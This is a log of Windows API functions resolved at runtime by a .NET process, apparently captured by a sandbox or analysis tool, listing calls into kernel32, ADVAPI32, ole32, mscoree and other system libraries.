DynamicLoader: ole32.dll/CoCreateInstance
DynamicLoader: shell32.dll/
DynamicLoader: ole32.dll/CoGetApartmentType
DynamicLoader: ole32.dll/CoRegisterInitializeSpy
DynamicLoader: ole32.dll/CoTaskMemFree
DynamicLoader: comctl32.dll/
DynamicLoader: OLEAUT32.dll/
DynamicLoader: ole32.dll/CoTaskMemAlloc
DynamicLoader: ole32.dll/CoGetMalloc
DynamicLoader: ole32.dll/CoInitializeEx
DynamicLoader: ole32.dll/CreateBindCtx
DynamicLoader: ole32.dll/CoTaskMemAlloc
DynamicLoader: comctl32.dll/
DynamicLoader: comctl32.dll/
DynamicLoader: comctl32.dll/
DynamicLoader: ADVAPI32.dll/RegEnumKeyW
DynamicLoader: OLEAUT32.dll/
DynamicLoader: ADVAPI32.dll/InitializeSecurityDescriptor
DynamicLoader: SETUPAPI.dll/CM_Get_Device_Interface_List_Size_ExW
DynamicLoader: ADVAPI32.dll/SetEntriesInAclW
DynamicLoader: ntmarta.dll/GetMartaExtensionInterface
DynamicLoader: ADVAPI32.dll/SetSecurityDescriptorDacl
DynamicLoader: ADVAPI32.dll/IsTextUnicode
DynamicLoader: comctl32.dll/
DynamicLoader: comctl32.dll/
DynamicLoader: comctl32.dll/
DynamicLoader: shell32.dll/
DynamicLoader: SETUPAPI.dll/CM_Get_Device_Interface_List_ExW
DynamicLoader: comctl32.dll/
DynamicLoader: ole32.dll/CoUninitialize
DynamicLoader: ole32.dll/CoGetMalloc
DynamicLoader: ole32.dll/CoTaskMemFree
DynamicLoader: comctl32.dll/
DynamicLoader: comctl32.dll/
DynamicLoader: comctl32.dll/
DynamicLoader: comctl32.dll/
DynamicLoader: comctl32.dll/
DynamicLoader: ntdll.dll/RtlDllShutdownInProgress
DynamicLoader: propsys.dll/PSCreateMemoryPropertyStore
DynamicLoader: sechost.dll/ConvertSidToStringSidW
DynamicLoader: profapi.dll/
DynamicLoader: LINKINFO.dll/CreateLinkInfoW
DynamicLoader: USER32.dll/IsCharAlphaW
DynamicLoader: USER32.dll/CharPrevW
DynamicLoader: ntshrui.dll/GetNetResourceFromLocalPathW
DynamicLoader: srvcli.dll/NetShareEnum
DynamicLoader: cscapi.dll/CscNetApiGetInterface
DynamicLoader: slc.dll/SLGetWindowsInformationDWORD
DynamicLoader: SHLWAPI.dll/PathRemoveFileSpecW
DynamicLoader: LINKINFO.dll/DestroyLinkInfo
DynamicLoader: propsys.dll/PropVariantToBoolean
DynamicLoader: ole32.dll/PropVariantClear
DynamicLoader: CRYPTSP.dll/CryptAcquireContextW
DynamicLoader: CRYPTSP.dll/CryptGenRandom
DynamicLoader: CRYPTSP.dll/CryptReleaseContext
DynamicLoader: ADVAPI32.dll/GetSecurityInfo
DynamicLoader: ADVAPI32.dll/SetSecurityInfo
DynamicLoader: ADVAPI32.dll/GetSecurityDescriptorControl
DynamicLoader: ole32.dll/CoRevokeInitializeSpy
DynamicLoader: comctl32.dll/
DynamicLoader: OLEAUT32.dll/
DynamicLoader: ADVAPI32.dll/RegOpenKeyExW
DynamicLoader: ADVAPI32.dll/RegQueryInfoKeyW
DynamicLoader: ADVAPI32.dll/RegEnumKeyExW
DynamicLoader: ADVAPI32.dll/RegEnumValueW
DynamicLoader: ADVAPI32.dll/RegCloseKey
DynamicLoader: ADVAPI32.dll/RegQueryValueExW
DynamicLoader: mscoree.dll/
DynamicLoader: ADVAPI32.dll/RegOpenKeyExW
DynamicLoader: ADVAPI32.dll/RegQueryValueExW
DynamicLoader: ADVAPI32.dll/RegCloseKey
DynamicLoader: mscoreei.dll/RegisterShimImplCallback
DynamicLoader: mscoreei.dll/RegisterShimImplCleanupCallback
DynamicLoader: mscoreei.dll/SetShellShimInstance
DynamicLoader: mscoreei.dll/OnShimDllMainCalled
DynamicLoader: mscoreei.dll/CorBindToRuntimeEx_RetAddr
DynamicLoader: mscoreei.dll/CorBindToRuntimeEx
DynamicLoader: SHLWAPI.dll/UrlIsW
DynamicLoader: kernel32.dll/GetCurrentPackageId
DynamicLoader: kernel32.dll/InitializeCriticalSectionAndSpinCount
DynamicLoader: msvcrt.dll/_set_error_mode
DynamicLoader: msvcrt.dll/?set_terminate@@YAP6AXXZP6AXXZ@Z
DynamicLoader: msvcrt.dll/_get_terminate
DynamicLoader: kernel32.dll/FindActCtxSectionStringW
DynamicLoader: kernel32.dll/GetSystemWindowsDirectoryW
DynamicLoader: mscoree.dll/GetProcessExecutableHeap
DynamicLoader: mscoreei.dll/GetProcessExecutableHeap_RetAddr
DynamicLoader: mscoreei.dll/GetProcessExecutableHeap
DynamicLoader: mscorwks.dll/SetLoadedByMscoree
DynamicLoader: mscorwks.dll/DllGetClassObjectInternal
DynamicLoader: mscorwks.dll/GetCLRFunction
DynamicLoader: ADVAPI32.dll/RegisterTraceGuidsW
DynamicLoader: ADVAPI32.dll/UnregisterTraceGuids
DynamicLoader: ADVAPI32.dll/GetTraceLoggerHandle
DynamicLoader: ADVAPI32.dll/GetTraceEnableLevel
DynamicLoader: ADVAPI32.dll/GetTraceEnableFlags
DynamicLoader: ADVAPI32.dll/TraceEvent
DynamicLoader: mscoree.dll/IEE
DynamicLoader: mscoreei.dll/IEE_RetAddr
DynamicLoader: mscoreei.dll/IEE
DynamicLoader: mscorwks.dll/IEE
DynamicLoader: mscoree.dll/GetStartupFlags
DynamicLoader: mscoreei.dll/GetStartupFlags_RetAddr
DynamicLoader: mscoreei.dll/GetStartupFlags
DynamicLoader: mscoree.dll/GetHostConfigurationFile
DynamicLoader: mscoreei.dll/GetHostConfigurationFile_RetAddr
DynamicLoader: mscoreei.dll/GetHostConfigurationFile
DynamicLoader: mscoreei.dll/GetCORVersion_RetAddr
DynamicLoader: mscoreei.dll/GetCORVersion
DynamicLoader: mscoree.dll/GetCORSystemDirectory
DynamicLoader: mscoreei.dll/GetCORSystemDirectory_RetAddr
DynamicLoader: mscoreei.dll/CreateConfigStream_RetAddr
DynamicLoader: mscoreei.dll/CreateConfigStream
DynamicLoader: ntdll.dll/RtlVirtualUnwind
DynamicLoader: kernel32.dll/IsWow64Process
DynamicLoader: kernel32.dll/GetSystemWindowsDirectoryW
DynamicLoader: ADVAPI32.dll/AllocateAndInitializeSid
DynamicLoader: ADVAPI32.dll/OpenProcessToken
DynamicLoader: ADVAPI32.dll/GetTokenInformation
DynamicLoader: ADVAPI32.dll/InitializeAcl
DynamicLoader: ADVAPI32.dll/AddAccessAllowedAce
DynamicLoader: ADVAPI32.dll/FreeSid
DynamicLoader: ADVAPI32.dll/AllocateAndInitializeSid
DynamicLoader: ADVAPI32.dll/OpenProcessToken
DynamicLoader: ADVAPI32.dll/GetTokenInformation
DynamicLoader: ADVAPI32.dll/InitializeAcl
DynamicLoader: ADVAPI32.dll/AddAccessAllowedAce
DynamicLoader: ADVAPI32.dll/FreeSid
DynamicLoader: kernel32.dll/SetThreadStackGuarantee
DynamicLoader: kernel32.dll/FlsSetValue
DynamicLoader: kernel32.dll/FlsGetValue
DynamicLoader: kernel32.dll/FlsAlloc
DynamicLoader: kernel32.dll/FlsFree
DynamicLoader: kernel32.dll/AddVectoredContinueHandler
DynamicLoader: kernel32.dll/RemoveVectoredContinueHandler
DynamicLoader: ADVAPI32.dll/ConvertSidToStringSidW
DynamicLoader: shell32.dll/SHGetFolderPathW
DynamicLoader: kernel32.dll/FlushProcessWriteBuffers
DynamicLoader: kernel32.dll/GetWriteWatch
DynamicLoader: kernel32.dll/ResetWriteWatch
DynamicLoader: kernel32.dll/CreateMemoryResourceNotification
DynamicLoader: kernel32.dll/QueryMemoryResourceNotification
DynamicLoader: kernel32.dll/GlobalMemoryStatusEx
DynamicLoader: ole32.dll/CoInitializeEx
DynamicLoader: OLEAUT32.dll/
DynamicLoader: kernel32.dll/GetUserDefaultUILanguage
DynamicLoader: OLEAUT32.dll/
DynamicLoader: ole32.dll/CoGetContextToken
DynamicLoader: kernel32.dll/GetVersionEx
DynamicLoader: kernel32.dll/GetVersionExW
DynamicLoader: kernel32.dll/GetVersionEx
DynamicLoader: kernel32.dll/GetVersionExW
DynamicLoader: kernel32.dll/GetFullPathName
DynamicLoader: kernel32.dll/GetFullPathNameW
DynamicLoader: kernel32.dll/SetErrorMode
DynamicLoader: kernel32.dll/GetFileAttributesEx
DynamicLoader: kernel32.dll/GetFileAttributesExW
DynamicLoader: kernel32.dll/SetErrorMode
DynamicLoader: version.dll/GetFileVersionInfoSize
DynamicLoader: version.dll/GetFileVersionInfoSizeW
DynamicLoader: version.dll/GetFileVersionInfo
DynamicLoader: version.dll/GetFileVersionInfoW
DynamicLoader: version.dll/VerQueryValue
DynamicLoader: version.dll/VerQueryValueW
DynamicLoader: kernel32.dll/lstrlen
DynamicLoader: kernel32.dll/lstrlenW
DynamicLoader: mscoree.dll/ND_RI2
DynamicLoader: mscoreei.dll/ND_RI2_RetAddr
DynamicLoader: mscoreei.dll/ND_RI2
DynamicLoader: kernel32.dll/lstrlen
DynamicLoader: kernel32.dll/lstrlenW
DynamicLoader: kernel32.dll/lstrcpy
DynamicLoader: kernel32.dll/lstrcpyW
DynamicLoader: ole32.dll/CoTaskMemAlloc
DynamicLoader: ole32.dll/CoTaskMemFree
DynamicLoader: version.dll/VerLanguageName
DynamicLoader: version.dll/VerLanguageNameW
DynamicLoader: kernel32.dll/CloseHandle
DynamicLoader: kernel32.dll/GetCurrentProcessId
DynamicLoader: kernel32.dll/GetCurrentProcessIdW
DynamicLoader: ADVAPI32.dll/LookupPrivilegeValue
DynamicLoader: ADVAPI32.dll/LookupPrivilegeValueW
DynamicLoader: kernel32.dll/GetCurrentProcess
DynamicLoader: ADVAPI32.dll/OpenProcessToken
DynamicLoader: ADVAPI32.dll/OpenProcessTokenW
DynamicLoader: ADVAPI32.dll/AdjustTokenPrivileges
DynamicLoader: ADVAPI32.dll/AdjustTokenPrivilegesW
DynamicLoader: kernel32.dll/CloseHandle
DynamicLoader: kernel32.dll/CloseHandle
DynamicLoader: kernel32.dll/OpenProcess
DynamicLoader: kernel32.dll/OpenProcessW
DynamicLoader: PSAPI.DLL/EnumProcessModules
DynamicLoader: PSAPI.DLL/EnumProcessModulesW
DynamicLoader: PSAPI.DLL/GetModuleInformation
DynamicLoader: PSAPI.DLL/GetModuleInformationW
DynamicLoader: PSAPI.DLL/GetModuleBaseName
DynamicLoader: PSAPI.DLL/GetModuleBaseNameW
DynamicLoader: PSAPI.DLL/GetModuleFileNameEx
DynamicLoader: PSAPI.DLL/GetModuleFileNameExW
DynamicLoader: kernel32.dll/GetExitCodeProcess
DynamicLoader: kernel32.dll/GetExitCodeProcessW
DynamicLoader: ntdll.dll/NtQuerySystemInformation
DynamicLoader: ntdll.dll/NtQuerySystemInformationW
DynamicLoader: USER32.dll/EnumWindows
DynamicLoader: USER32.dll/EnumWindowsW
DynamicLoader: USER32.dll/GetWindowThreadProcessId
DynamicLoader: USER32.dll/GetWindowThreadProcessIdW
DynamicLoader: kernel32.dll/WerSetFlags
DynamicLoader: kernel32.dll/SetThreadPreferredUILanguages
DynamicLoader: kernel32.dll/SetThreadPreferredUILanguagesW
DynamicLoader: kernel32.dll/GetThreadPreferredUILanguages
DynamicLoader: kernel32.dll/GetThreadPreferredUILanguagesW
DynamicLoader: kernel32.dll/GetUserDefaultLocaleName
DynamicLoader: kernel32.dll/GetUserDefaultLocaleNameW
DynamicLoader: kernel32.dll/GetEnvironmentVariable
DynamicLoader: kernel32.dll/GetEnvironmentVariableW
DynamicLoader: ADVAPI32.dll/RegCloseKey
DynamicLoader: ADVAPI32.dll/RegOpenKeyEx
DynamicLoader: ADVAPI32.dll/RegOpenKeyExW
DynamicLoader: ADVAPI32.dll/RegQueryValueEx
DynamicLoader: ADVAPI32.dll/RegQueryValueExW
DynamicLoader: ADVAPI32.dll/RegQueryValueEx
DynamicLoader: ADVAPI32.dll/RegQueryValueExW
DynamicLoader: ADVAPI32.dll/CryptAcquireContextA
DynamicLoader: ADVAPI32.dll/CryptReleaseContext
DynamicLoader: ADVAPI32.dll/CryptCreateHash
DynamicLoader: ADVAPI32.dll/CryptDestroyHash
DynamicLoader: ADVAPI32.dll/CryptHashData
DynamicLoader: ADVAPI32.dll/CryptGetHashParam
DynamicLoader: ADVAPI32.dll/CryptImportKey
DynamicLoader: ADVAPI32.dll/CryptExportKey
DynamicLoader: ADVAPI32.dll/CryptGenKey
DynamicLoader: ADVAPI32.dll/CryptGetKeyParam
DynamicLoader: ADVAPI32.dll/CryptDestroyKey
DynamicLoader: ADVAPI32.dll/CryptVerifySignatureA
DynamicLoader: ADVAPI32.dll/CryptSignHashA
DynamicLoader: ADVAPI32.dll/CryptGetProvParam
DynamicLoader: ADVAPI32.dll/CryptGetUserKey
DynamicLoader: ADVAPI32.dll/CryptEnumProvidersA
DynamicLoader: CRYPTSP.dll/CryptImportKey
DynamicLoader: CRYPTSP.dll/CryptHashData
DynamicLoader: CRYPTSP.dll/CryptGetHashParam
DynamicLoader: CRYPTSP.dll/CryptDestroyHash
DynamicLoader: CRYPTSP.dll/CryptDestroyKey
DynamicLoader: mscoreei.dll/_CorDllMain_RetAddr
DynamicLoader: mscoreei.dll/_CorDllMain
DynamicLoader: mscoree.dll/GetTokenForVTableEntry
DynamicLoader: mscoree.dll/SetTargetForVTableEntry
DynamicLoader: mscoree.dll/GetTargetForVTableEntry
DynamicLoader: mscoreei.dll/LoadLibraryShim_RetAddr
DynamicLoader: mscoreei.dll/LoadLibraryShim
DynamicLoader: culture.dll/ConvertLangIdToCultureName
DynamicLoader: ole32.dll/CoCreateGuid
DynamicLoader: kernel32.dll/CreateFile
DynamicLoader: kernel32.dll/CreateFileW
DynamicLoader: kernel32.dll/GetConsoleScreenBufferInfo
DynamicLoader: kernel32.dll/GetConsoleScreenBufferInfoW
DynamicLoader: kernel32.dll/GetCurrentProcess
DynamicLoader: kernel32.dll/GetCurrentProcessW
DynamicLoader: ADVAPI32.dll/OpenProcessToken
DynamicLoader: ADVAPI32.dll/OpenProcessTokenW
DynamicLoader: kernel32.dll/LocalFree
DynamicLoader: ADVAPI32.dll/GetTokenInformation
DynamicLoader: ADVAPI32.dll/GetTokenInformationW
DynamicLoader: kernel32.dll/LocalAlloc
DynamicLoader: kernel32.dll/LocalAllocW
DynamicLoader: mscoree.dll/ND_RI4
DynamicLoader: mscoreei.dll/ND_RI4_RetAddr
DynamicLoader: mscoreei.dll/ND_RI4
DynamicLoader: ADVAPI32.dll/DuplicateTokenEx
DynamicLoader: ADVAPI32.dll/DuplicateTokenExW
DynamicLoader: ADVAPI32.dll/CheckTokenMembership
DynamicLoader: ADVAPI32.dll/CheckTokenMembershipW
DynamicLoader: kernel32.dll/GetConsoleTitle
DynamicLoader: kernel32.dll/GetConsoleTitleW
DynamicLoader: mscorjit.dll/getJit
DynamicLoader: mscorwks.dll/GetCLRFunction
DynamicLoader: kernel32.dll/SetConsoleTitle
DynamicLoader: kernel32.dll/SetConsoleTitleW
DynamicLoader: kernel32.dll/SetConsoleCtrlHandler
DynamicLoader: kernel32.dll/SetConsoleCtrlHandlerW
DynamicLoader: kernel32.dll/CreateEvent
DynamicLoader: kernel32.dll/CreateEventW
DynamicLoader: ntdll.dll/WinSqmIsOptedIn
DynamicLoader: kernel32.dll/ExpandEnvironmentStrings
DynamicLoader: kernel32.dll/ExpandEnvironmentStringsW
DynamicLoader: shfolder.dll/SHGetFolderPath
DynamicLoader: shfolder.dll/SHGetFolderPathW
DynamicLoader: kernel32.dll/SetEnvironmentVariable
DynamicLoader: kernel32.dll/SetEnvironmentVariableW
DynamicLoader: kernel32.dll/GetACP
DynamicLoader: kernel32.dll/UnmapViewOfFile
DynamicLoader: kernel32.dll/CreateFile
DynamicLoader: kernel32.dll/CreateFileW
DynamicLoader: kernel32.dll/GetFileType
DynamicLoader: kernel32.dll/ReadFile
DynamicLoader: kernel32.dll/GetSystemInfo
DynamicLoader: kernel32.dll/VirtualQuery
DynamicLoader: ADVAPI32.dll/RegQueryInfoKey
DynamicLoader: ADVAPI32.dll/RegQueryInfoKeyW
DynamicLoader: ADVAPI32.dll/RegEnumValue
DynamicLoader: ADVAPI32.dll/RegEnumValueW
DynamicLoader: ADVAPI32.dll/RegEnumKeyEx
DynamicLoader: ADVAPI32.dll/RegEnumKeyExW
DynamicLoader: secur32.dll/GetUserNameEx
DynamicLoader: secur32.dll/GetUserNameExW
DynamicLoader: ADVAPI32.dll/GetUserName
DynamicLoader: ADVAPI32.dll/GetUserNameW
DynamicLoader: kernel32.dll/ReleaseMutex
DynamicLoader: ADVAPI32.dll/RegisterEventSource
DynamicLoader: ADVAPI32.dll/RegisterEventSourceW
DynamicLoader: ADVAPI32.dll/DeregisterEventSource
DynamicLoader: ADVAPI32.dll/ReportEvent
DynamicLoader: ADVAPI32.dll/ReportEventW
DynamicLoader: kernel32.dll/GetLogicalDrives
DynamicLoader: kernel32.dll/GetDriveType
DynamicLoader: kernel32.dll/GetDriveTypeW
DynamicLoader: kernel32.dll/GetVolumeInformation
DynamicLoader: kernel32.dll/GetVolumeInformationW
DynamicLoader: ADVAPI32.dll/RegCloseKey
DynamicLoader: kernel32.dll/GetCurrentDirectory
DynamicLoader: kernel32.dll/GetCurrentDirectoryW
DynamicLoader: mscoreei.dll/GetTokenForVTableEntry_RetAddr
DynamicLoader: mscoreei.dll/GetTokenForVTableEntry
DynamicLoader: mscoreei.dll/SetTargetForVTableEntry_RetAddr
DynamicLoader: mscoreei.dll/SetTargetForVTableEntry
DynamicLoader: kernel32.dll/GetLastError
DynamicLoader: kernel32.dll/LocalAlloc
DynamicLoader: mscoree.dll/IEE
DynamicLoader: kernel32.dll/GetStdHandle
DynamicLoader: kernel32.dll/GetStdHandleW
DynamicLoader: kernel32.dll/GetConsoleMode
DynamicLoader: kernel32.dll/GetConsoleModeW
DynamicLoader: kernel32.dll/SetEvent
DynamicLoader: kernel32.dll/SetThreadUILanguage
DynamicLoader: kernel32.dll/SetThreadUILanguageW
DynamicLoader: kernel32.dll/FindFirstFile
DynamicLoader: kernel32.dll/FindFirstFileW
DynamicLoader: kernel32.dll/FindClose
DynamicLoader: CRYPTSP.dll/CryptExportKey
DynamicLoader: CRYPTSP.dll/CryptCreateHash
DynamicLoader: ole32.dll/CoUninitialize
DynamicLoader: CRYPTSP.dll/CryptReleaseContext
DynamicLoader: mscoree.dll/CorExitProcess
DynamicLoader: mscoreei.dll/CorExitProcess_RetAddr
DynamicLoader: mscoreei.dll/CorExitProcess
DynamicLoader: mscorwks.dll/CorExitProcess
DynamicLoader: mscorwks.dll/_CorDllMain
DynamicLoader: kernel32.dll/CreateActCtxW
DynamicLoader: kernel32.dll/AddRefActCtx
DynamicLoader: kernel32.dll/ReleaseActCtx
DynamicLoader: kernel32.dll/ActivateActCtx
DynamicLoader: kernel32.dll/DeactivateActCtx
DynamicLoader: kernel32.dll/GetCurrentActCtx
DynamicLoader: kernel32.dll/QueryActCtxW
DynamicLoader: netutils.dll/NetApiBufferFree
DynamicLoader: ADVAPI32.dll/UnregisterTraceGuids
DynamicLoader: kernel32.dll/SetThreadUILanguage
DynamicLoader: kernel32.dll/CopyFileExW
DynamicLoader: kernel32.dll/IsDebuggerPresent
DynamicLoader: kernel32.dll/SetConsoleInputExeNameW
DynamicLoader: kernel32.dll/SortGetHandle
DynamicLoader: kernel32.dll/SortCloseHandle
DynamicLoader: CRYPTBASE.dll/SystemFunction036
DynamicLoader: ole32.dll/CoCreateInstance
DynamicLoader: shell32.dll/
DynamicLoader: ole32.dll/CoGetApartmentType
DynamicLoader: ole32.dll/CoRegisterInitializeSpy
DynamicLoader: ole32.dll/CoTaskMemFree
DynamicLoader: comctl32.dll/
DynamicLoader: OLEAUT32.dll/
DynamicLoader: ole32.dll/CoTaskMemAlloc
DynamicLoader: ole32.dll/CoGetMalloc
DynamicLoader: ole32.dll/CoInitializeEx
DynamicLoader: ole32.dll/CreateBindCtx
DynamicLoader: ole32.dll/CoTaskMemAlloc
DynamicLoader: comctl32.dll/
DynamicLoader: comctl32.dll/
DynamicLoader: comctl32.dll/
DynamicLoader: ADVAPI32.dll/RegEnumKeyW
DynamicLoader: OLEAUT32.dll/
DynamicLoader: SETUPAPI.dll/CM_Get_Device_Interface_List_Size_ExW
DynamicLoader: ADVAPI32.dll/InitializeSecurityDescriptor
DynamicLoader: ADVAPI32.dll/SetEntriesInAclW
DynamicLoader: ntmarta.dll/GetMartaExtensionInterface
DynamicLoader: ADVAPI32.dll/SetSecurityDescriptorDacl
DynamicLoader: ADVAPI32.dll/IsTextUnicode
DynamicLoader: comctl32.dll/
DynamicLoader: comctl32.dll/
DynamicLoader: comctl32.dll/
DynamicLoader: shell32.dll/
DynamicLoader: comctl32.dll/
DynamicLoader: ole32.dll/CoUninitialize
DynamicLoader: ole32.dll/CoGetMalloc
DynamicLoader: ole32.dll/CoTaskMemFree
DynamicLoader: SETUPAPI.dll/CM_Get_Device_Interface_List_ExW
DynamicLoader: comctl32.dll/
DynamicLoader: comctl32.dll/
DynamicLoader: comctl32.dll/
DynamicLoader: comctl32.dll/
DynamicLoader: comctl32.dll/
DynamicLoader: ntdll.dll/RtlDllShutdownInProgress
DynamicLoader: propsys.dll/PSCreateMemoryPropertyStore
DynamicLoader: sechost.dll/ConvertSidToStringSidW
DynamicLoader: profapi.dll/
DynamicLoader: LINKINFO.dll/CreateLinkInfoW
DynamicLoader: USER32.dll/IsCharAlphaW
DynamicLoader: USER32.dll/CharPrevW
DynamicLoader: ntshrui.dll/GetNetResourceFromLocalPathW
DynamicLoader: srvcli.dll/NetShareEnum
DynamicLoader: cscapi.dll/CscNetApiGetInterface
DynamicLoader: slc.dll/SLGetWindowsInformationDWORD
DynamicLoader: SHLWAPI.dll/PathRemoveFileSpecW
DynamicLoader: LINKINFO.dll/DestroyLinkInfo
DynamicLoader: propsys.dll/PropVariantToBoolean
DynamicLoader: ole32.dll/PropVariantClear
DynamicLoader: CRYPTSP.dll/CryptAcquireContextW
DynamicLoader: CRYPTSP.dll/CryptGenRandom
DynamicLoader: CRYPTSP.dll/CryptReleaseContext
DynamicLoader: ole32.dll/CoRevokeInitializeSpy
DynamicLoader: comctl32.dll/
DynamicLoader: OLEAUT32.dll/
DynamicLoader: ADVAPI32.dll/RegOpenKeyExW
DynamicLoader: ADVAPI32.dll/RegQueryInfoKeyW
DynamicLoader: ADVAPI32.dll/RegEnumKeyExW
DynamicLoader: ADVAPI32.dll/RegEnumValueW
DynamicLoader: ADVAPI32.dll/RegCloseKey
DynamicLoader: ADVAPI32.dll/RegQueryValueExW
DynamicLoader: mscoree.dll/
DynamicLoader: ADVAPI32.dll/RegOpenKeyExW
DynamicLoader: ADVAPI32.dll/RegQueryValueExW
DynamicLoader: ADVAPI32.dll/RegCloseKey
DynamicLoader: mscoreei.dll/RegisterShimImplCallback
DynamicLoader: mscoreei.dll/RegisterShimImplCleanupCallback
DynamicLoader: mscoreei.dll/SetShellShimInstance
DynamicLoader: mscoreei.dll/OnShimDllMainCalled
DynamicLoader: mscoreei.dll/CorBindToRuntimeEx_RetAddr
DynamicLoader: mscoreei.dll/CorBindToRuntimeEx
DynamicLoader: SHLWAPI.dll/UrlIsW
DynamicLoader: kernel32.dll/GetCurrentPackageId
DynamicLoader: kernel32.dll/InitializeCriticalSectionAndSpinCount
DynamicLoader: msvcrt.dll/_set_error_mode
DynamicLoader: msvcrt.dll/?set_terminate@@YAP6AXXZP6AXXZ@Z
DynamicLoader: msvcrt.dll/_get_terminate
DynamicLoader: kernel32.dll/FindActCtxSectionStringW
DynamicLoader: kernel32.dll/GetSystemWindowsDirectoryW
DynamicLoader: mscoree.dll/GetProcessExecutableHeap
DynamicLoader: mscoreei.dll/GetProcessExecutableHeap_RetAddr
DynamicLoader: mscoreei.dll/GetProcessExecutableHeap
DynamicLoader: mscorwks.dll/SetLoadedByMscoree
DynamicLoader: mscorwks.dll/DllGetClassObjectInternal
DynamicLoader: mscorwks.dll/GetCLRFunction
DynamicLoader: ADVAPI32.dll/RegisterTraceGuidsW
DynamicLoader: ADVAPI32.dll/UnregisterTraceGuids
DynamicLoader: ADVAPI32.dll/GetTraceLoggerHandle
DynamicLoader: ADVAPI32.dll/GetTraceEnableLevel
DynamicLoader: ADVAPI32.dll/GetTraceEnableFlags
DynamicLoader: ADVAPI32.dll/TraceEvent
DynamicLoader: mscoree.dll/IEE
DynamicLoader: mscoreei.dll/IEE_RetAddr
DynamicLoader: mscoreei.dll/IEE
DynamicLoader: mscorwks.dll/IEE
DynamicLoader: mscoree.dll/GetStartupFlags
DynamicLoader: mscoreei.dll/GetStartupFlags_RetAddr
DynamicLoader: mscoreei.dll/GetStartupFlags
DynamicLoader: mscoree.dll/GetHostConfigurationFile
DynamicLoader: mscoreei.dll/GetHostConfigurationFile_RetAddr
DynamicLoader: mscoreei.dll/GetHostConfigurationFile
DynamicLoader: mscoreei.dll/GetCORVersion_RetAddr
DynamicLoader: mscoreei.dll/GetCORVersion
DynamicLoader: mscoree.dll/GetCORSystemDirectory
DynamicLoader: mscoreei.dll/GetCORSystemDirectory_RetAddr
DynamicLoader: mscoreei.dll/CreateConfigStream_RetAddr
DynamicLoader: mscoreei.dll/CreateConfigStream
DynamicLoader: ntdll.dll/RtlVirtualUnwind
DynamicLoader: kernel32.dll/IsWow64Process
DynamicLoader: kernel32.dll/GetSystemWindowsDirectoryW
DynamicLoader: ADVAPI32.dll/AllocateAndInitializeSid
DynamicLoader: ADVAPI32.dll/OpenProcessToken
DynamicLoader: ADVAPI32.dll/GetTokenInformation
DynamicLoader: ADVAPI32.dll/InitializeAcl
DynamicLoader: ADVAPI32.dll/AddAccessAllowedAce
DynamicLoader: ADVAPI32.dll/FreeSid
DynamicLoader: ADVAPI32.dll/AllocateAndInitializeSid
DynamicLoader: ADVAPI32.dll/OpenProcessToken
DynamicLoader: ADVAPI32.dll/GetTokenInformation
DynamicLoader: ADVAPI32.dll/InitializeAcl
DynamicLoader: ADVAPI32.dll/AddAccessAllowedAce
DynamicLoader: ADVAPI32.dll/FreeSid
DynamicLoader: kernel32.dll/SetThreadStackGuarantee
DynamicLoader: kernel32.dll/FlsSetValue
DynamicLoader: kernel32.dll/FlsGetValue
DynamicLoader: kernel32.dll/FlsAlloc
DynamicLoader: kernel32.dll/FlsFree
DynamicLoader: kernel32.dll/AddVectoredContinueHandler
DynamicLoader: kernel32.dll/RemoveVectoredContinueHandler
DynamicLoader: ADVAPI32.dll/ConvertSidToStringSidW
DynamicLoader: shell32.dll/SHGetFolderPathW
DynamicLoader: kernel32.dll/FlushProcessWriteBuffers
DynamicLoader: kernel32.dll/GetWriteWatch
DynamicLoader: kernel32.dll/ResetWriteWatch
DynamicLoader: kernel32.dll/CreateMemoryResourceNotification
DynamicLoader: kernel32.dll/QueryMemoryResourceNotification
DynamicLoader: kernel32.dll/GlobalMemoryStatusEx
DynamicLoader: ole32.dll/CoInitializeEx
DynamicLoader: ole32.dll/CoGetContextToken
DynamicLoader: OLEAUT32.dll/
DynamicLoader: kernel32.dll/GetUserDefaultUILanguage
DynamicLoader: OLEAUT32.dll/
DynamicLoader: kernel32.dll/GetVersionEx
DynamicLoader: kernel32.dll/GetVersionExW
DynamicLoader: kernel32.dll/GetVersionEx
DynamicLoader: kernel32.dll/GetVersionExW
DynamicLoader: kernel32.dll/GetFullPathName
DynamicLoader: kernel32.dll/GetFullPathNameW
DynamicLoader: kernel32.dll/SetErrorMode
DynamicLoader: kernel32.dll/GetFileAttributesEx
DynamicLoader: kernel32.dll/GetFileAttributesExW
DynamicLoader: kernel32.dll/SetErrorMode
DynamicLoader: version.dll/GetFileVersionInfoSize
DynamicLoader: version.dll/GetFileVersionInfoSizeW
DynamicLoader: version.dll/GetFileVersionInfo
DynamicLoader: version.dll/GetFileVersionInfoW
DynamicLoader: version.dll/VerQueryValue
DynamicLoader: version.dll/VerQueryValueW
DynamicLoader: kernel32.dll/lstrlen
DynamicLoader: kernel32.dll/lstrlenW
DynamicLoader: mscoree.dll/ND_RI2
DynamicLoader: mscoreei.dll/ND_RI2_RetAddr
DynamicLoader: mscoreei.dll/ND_RI2
DynamicLoader: kernel32.dll/lstrlen
DynamicLoader: kernel32.dll/lstrlenW
DynamicLoader: kernel32.dll/lstrcpy
DynamicLoader: kernel32.dll/lstrcpyW
DynamicLoader: ole32.dll/CoTaskMemAlloc
DynamicLoader: ole32.dll/CoTaskMemFree
DynamicLoader: version.dll/VerLanguageName
DynamicLoader: version.dll/VerLanguageNameW
DynamicLoader: kernel32.dll/CloseHandle
DynamicLoader: kernel32.dll/GetCurrentProcessId
DynamicLoader: kernel32.dll/GetCurrentProcessIdW
DynamicLoader: ADVAPI32.dll/LookupPrivilegeValue
DynamicLoader: ADVAPI32.dll/LookupPrivilegeValueW
DynamicLoader: kernel32.dll/GetCurrentProcess
DynamicLoader: ADVAPI32.dll/OpenProcessToken
DynamicLoader: ADVAPI32.dll/OpenProcessTokenW
DynamicLoader: ADVAPI32.dll/AdjustTokenPrivileges
DynamicLoader: ADVAPI32.dll/AdjustTokenPrivilegesW
DynamicLoader: kernel32.dll/CloseHandle
DynamicLoader: kernel32.dll/CloseHandle
DynamicLoader: kernel32.dll/OpenProcess
DynamicLoader: kernel32.dll/OpenProcessW
DynamicLoader: PSAPI.DLL/EnumProcessModules
DynamicLoader: PSAPI.DLL/EnumProcessModulesW
DynamicLoader: PSAPI.DLL/GetModuleInformation
DynamicLoader: PSAPI.DLL/GetModuleInformationW
DynamicLoader: PSAPI.DLL/GetModuleBaseName
DynamicLoader: PSAPI.DLL/GetModuleBaseNameW
DynamicLoader: PSAPI.DLL/GetModuleFileNameEx
DynamicLoader: PSAPI.DLL/GetModuleFileNameExW
